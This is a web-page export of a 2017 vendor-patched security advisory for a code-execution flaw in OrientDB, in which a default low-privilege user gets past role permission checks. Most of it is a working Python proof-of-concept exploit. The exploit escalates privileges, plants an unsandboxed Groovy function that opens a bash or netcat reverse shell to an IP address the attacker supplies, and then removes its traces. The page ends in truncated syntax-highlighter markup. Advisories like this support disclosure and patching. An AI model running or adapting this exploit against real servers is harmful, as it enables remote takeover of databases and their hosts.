{"id":8338,"date":"2017-07-13T14:19:49","date_gmt":"2017-07-13T22:19:49","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/07\/13\/news-2112\/"},"modified":"2017-07-13T14:19:49","modified_gmt":"2017-07-13T22:19:49","slug":"news-2112","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/07\/13\/news-2112\/","title":{"rendered":"SSD Advisory \u2013 OrientDB Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Thu, 13 Jul 2017 06:49:26 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\" id=\"a-href-3318\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory reports a vulnerability in OrientDB which allows a low-privileged database user to make the server execute arbitrary code.<\/p>\n<p>OrientDB is a Distributed Graph Database engine with the flexibility of a Document Database all in one product. 
The first and best scalable, high-performance, operational NoSQL database.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Francis Alexander, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address this vulnerability.<br \/> For more information: <a href=\"https:\/\/github.com\/orientechnologies\/orientdb\/wiki\/OrientDB-2.2-Release-Notes#security\" target=\"_blank\">https:\/\/github.com\/orientechnologies\/orientdb\/wiki\/OrientDB-2.2-Release-Notes#security<\/a>.<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> OrientDB uses an RBAC model for its authentication scheme. By default, OrientDB has 3 roles &#8211; <em>admin<\/em>, <em>writer<\/em> and <em>reader<\/em>. Each role has a user of the same name, and every database created on the server gets these 3 users by default.<\/p>\n<p>The privileges of the users are:<\/p>\n<ul>\n<li><u>admin<\/u> &#8211; access to all functions on the database without any limitation<\/li>\n<li><u>reader<\/u> &#8211; read-only user. The reader can query any record in the database, but can&#8217;t modify or delete records. It has no access to internal information, such as the users and roles themselves<\/li>\n<li><u>writer<\/u> &#8211; same as the &#8216;reader&#8217;, but it can also create, update and delete records<\/li>\n<\/ul>\n<p>The <em>ORole<\/em> structure holds users and their roles and is accessible only to the <em>admin<\/em> user. OrientDB requires read permission on <em>oRole<\/em> before a user may display the permissions of users or run other queries that touch <em>oRole<\/em>. 
<\/p>\n<p>From version 2.2.x onwards, whenever <em>oRole<\/em> is queried with a <em>where<\/em>, <em>fetchplan<\/em> or <em>order by<\/em> clause, this permission check is skipped and the information is returned to unprivileged users.<\/p>\n<p>Example:<\/p>\n<div id=\"crayon-5967f204b10ca277479442\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">select * from oRole order by name;<\/textarea><\/div>\n<\/div>\n<p>The <em>writer<\/em> user is created with every database you create. Thus even if the DB admin changes the <em>admin<\/em> user&#8217;s password, an attacker would still be able to get code execution with the <em>writer<\/em> user.<\/p>\n<p>Because the <em>where<\/em>, <em>fetchplan<\/em> and <em>order by<\/em> clauses let us reach <em>oRole<\/em> despite the missing permission, and OrientDB allows functions written in Groovy whose wrapper has no sandbox and exposes system functionality, we can run any command we want on the server.<\/p>\n<p><u>Sample Groovy function:<\/u><br \/> <u>Command.md<\/u><\/p>\n<div id=\"crayon-5967f204b10d5272783411\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">def command = 'rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081 &gt;\/tmp\/f'\nFile file = new File(\"hello.sh\")\nfile.delete()\nfile &lt;&lt; (\"#!\/bin\/bash\\n\")\nfile &lt;&lt; (command)\ndef proc = \"bash hello.sh\".execute()<\/textarea><\/div>\n<\/div>\n<p><strong>Proof of Concept<\/strong><br \/> Run Netcat on port 8081:<\/p>\n<div id=\"crayon-5967f204b10d8370802562\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">nc -lv 8081<\/textarea><\/div>\n<\/div>\n<p>Run the following:<\/p>\n<p><!-- Crayon 
Syntax Highlighter v_2.7.2_beta --><\/p>\n<div id=\"crayon-5967f204b10da574582436\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">python PoC.py ip [port]   # By default uses port 2480<\/textarea><\/div>\n<\/div>\n<p><u>PoC.py<\/u><\/p>\n<div id=\"crayon-5967f204b10dc863783322\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain 
Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  import requests  import json  import string  import random    target = sys.argv[1]    try:      port = sys.argv[2] if sys.argv[2] else 2480  except:      port = 2480    url = &#8220;http:\/\/%s:%s\/command\/GratefulDeadConcerts\/sql\/-\/20?format=rid,type,version,class,graph&#8221;%(target,port)      def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):      return &#8221;.join(random.choice(chars) for _ in range(size))    def enum_databases(target,port=&#8221;2480&#8243;):        base_url = &#8220;http:\/\/%s:%s\/listDatabases&#8221;%(target,port)      req = requests.get(base_url)        if req.status_code == 200:          #print &#8220;[+] Database Enumeration successful&#8221;          database = req.json()[&#8216;databases&#8217;]            return database        return False    def check_version(target,port=&#8221;2480&#8243;):      base_url = &#8220;http:\/\/%s:%s\/listDatabases&#8221;%(target,port)      req = requests.get(base_url)     
   if req.status_code == 200:            headers = req.headers[&#8216;server&#8217;]          #print headers          if &#8220;2.2&#8221; in headers or &#8220;3.&#8221; in headers:              return True        return False    def run_queries(permission,db,content=&#8221;&#8221;):        databases = enum_databases(target)        url = &#8220;http:\/\/%s:%s\/command\/%s\/sql\/-\/20?format=rid,type,version,class,graph&#8221;%(target,port,databases[0])        priv_enable = [&#8220;create&#8221;,&#8221;read&#8221;,&#8221;update&#8221;,&#8221;execute&#8221;,&#8221;delete&#8221;]      #query = &#8220;GRANT create ON database.class.ouser TO writer&#8221;        for priv in priv_enable:            if permission == &#8220;GRANT&#8221;:              query = &#8220;GRANT %s ON %s TO writer&#8221;%(priv,db)          else:              query = &#8220;REVOKE %s ON %s FROM writer&#8221;%(priv,db)          req = requests.post(url,data=query,auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))          if req.status_code == 200:              pass          else:              if priv == &#8220;execute&#8221;:                  return True              return False        print &#8220;[+] %s&#8221;%(content)      return True    def priv_escalation(target,port=&#8221;2480&#8221;):        print &#8220;[+] Checking OrientDB Database version is greater than 2.2&#8221;        if check_version(target,port):            priv1 = run_queries(&#8220;GRANT&#8221;,&#8221;database.class.ouser&#8221;,&#8221;Privilege Escalation done checking enabling operations on database.function&#8221;)          priv2 = run_queries(&#8220;GRANT&#8221;,&#8221;database.function&#8221;,&#8221;Enabled functional operations on database.function&#8221;)          priv3 = run_queries(&#8220;GRANT&#8221;,&#8221;database.systemclusters&#8221;,&#8221;Enabling access to system clusters&#8221;)            if priv1 and priv2 and priv3:              return True        return False    def exploit(target,port=&#8221;2480&#8243;):  
      #query = &#8216;&#8221;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;most&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8242;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:null&#8217;        #query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;ost&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;whoami&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:None}        func_name = random_function_name()        print func_name        databases = enum_databases(target)        reverse_ip = raw_input(&#8216;Enter the ip to connect back: &#8216;)        query = &#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;+func_name+'&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/&#8217;+reverse_ip+&#8217;\/8081 0&gt;&amp;1&#8242;;File file = new File(\\&#8221;hello.sh\\&#8221;);file.delete();file &lt;&lt; (\\&#8221;#!\/bin\/bash\\\\n\\&#8221;);file &lt;&lt; (command);def proc = \\&#8221;bash hello.sh\\&#8221;.execute();&#8221;,&#8221;parameters&#8221;:null}&#8217;      #query = 
&#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;+func_name+'&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081 &gt;\/tmp\/f&#8217; u000a File file = new File(&#8220;hello.sh&#8221;)u000a     file.delete()       u000a     file &lt;&lt; (&#8220;#!\/bin\/bash&#8221;)u000a     file &lt;&lt; (command)n    def proc = &#8220;bash hello.sh&#8221;.execute() &#8220;,&#8221;parameters&#8221;:null}&#8217;      #query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;lllasd&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute();&#8221;,&#8221;parameters&#8221;:None}      req = requests.post(&#8220;http:\/\/%s:%s\/document\/%s\/-1:-1&#8243;%(target,port,databases[0]),data=query,auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))        if req.status_code == 201:            #print req.status_code          #print req.json()            func_id = req.json()[&#8216;@rid&#8217;].strip(&#8220;#&#8221;)          #print func_id            print &#8220;[+] Exploitation successful, get ready for your shell.Executing %s&#8221;%(func_name)            req = requests.post(&#8220;http:\/\/%s:%s\/function\/%s\/%s&#8221;%(target,port,databases[0],func_name),auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))          #print req.status_code          #print req.text            if req.status_code == 200:              print &#8220;[+] Open netcat at 
port 8081..&#8221;          else:              print &#8220;[+] Exploitation failed at last step, try running the script again.&#8221;              print req.status_code              print req.text            #print &#8220;[+] Deleting traces..&#8221;            req = requests.delete(&#8220;http:\/\/%s:%s\/document\/%s\/%s&#8221;%(target,port,databases[0],func_id),auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))          priv1 = run_queries(&#8220;REVOKE&#8221;,&#8221;database.class.ouser&#8221;,&#8221;Cleaning Up..database.class.ouser&#8221;)          priv2 = run_queries(&#8220;REVOKE&#8221;,&#8221;database.function&#8221;,&#8221;Cleaning Up..database.function&#8221;)          priv3 = run_queries(&#8220;REVOKE&#8221;,&#8221;database.systemclusters&#8221;,&#8221;Cleaning Up..database.systemclusters&#8221;)            #print req.status_code          #print req.text    def main():        target = sys.argv[1]      #port = sys.argv[1] if sys.argv[1] else 2480      try:          port = sys.argv[2] if sys.argv[2] else 2480          #print port      except:          port = 2480      if priv_escalation(target,port):          exploit(target,port)      else:          print &#8220;[+] Target not vulnerable&#8221;    main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n
data-line=\"crayon-5967f204b10dc863783322-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-110\">110<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5967f204b10dc863783322-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-131\">131<\/div>\n<div class=\"crayon-num 
crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-151\">151<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; 
line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-1\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-2\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-3\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">json<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-4\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">string<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-5\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">random<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-7\"><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-9\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-11\"><span class=\"crayon-st\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-14\"><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;http:\/\/%s:%s\/command\/GratefulDeadConcerts\/sql\/-\/20?format=rid,type,version,class,graph&quot;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5967f204b10dc863783322-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-17\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">random_function_name<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">chars<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-k\">string<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ascii_lowercase<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">string<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">digits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">''<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-k\">random<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">choice<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">chars<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">_<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">range<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-20\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enum_databases<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;2480&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">base_url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;http:\/\/%s:%s\/listDatabases&quot;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-23\"><span 